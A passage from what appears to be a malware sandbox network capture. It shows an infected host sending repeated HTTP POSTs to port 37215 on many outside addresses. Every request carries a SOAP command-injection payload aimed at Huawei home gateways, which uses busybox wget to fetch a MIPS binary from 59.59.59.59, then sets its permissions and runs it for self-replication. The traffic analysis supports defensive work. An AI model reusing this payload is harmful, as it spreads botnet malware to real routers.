2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1471192.168.2.154807041.84.54.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.873497963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1472192.168.2.1540830157.83.72.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.873516083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1473192.168.2.1539604197.67.23.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.873542070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1474192.168.2.1551822197.49.217.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.882709026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1475192.168.2.1556132157.162.232.13137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.882745981 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1476192.168.2.155413624.156.191.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.887181044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1477192.168.2.1551494148.133.186.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.819734097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1478192.168.2.155903288.82.139.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.819736958 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1479192.168.2.153776041.77.48.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.819820881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1480192.168.2.153464041.176.64.11237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.830554008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1481192.168.2.155082641.53.160.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.830554008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
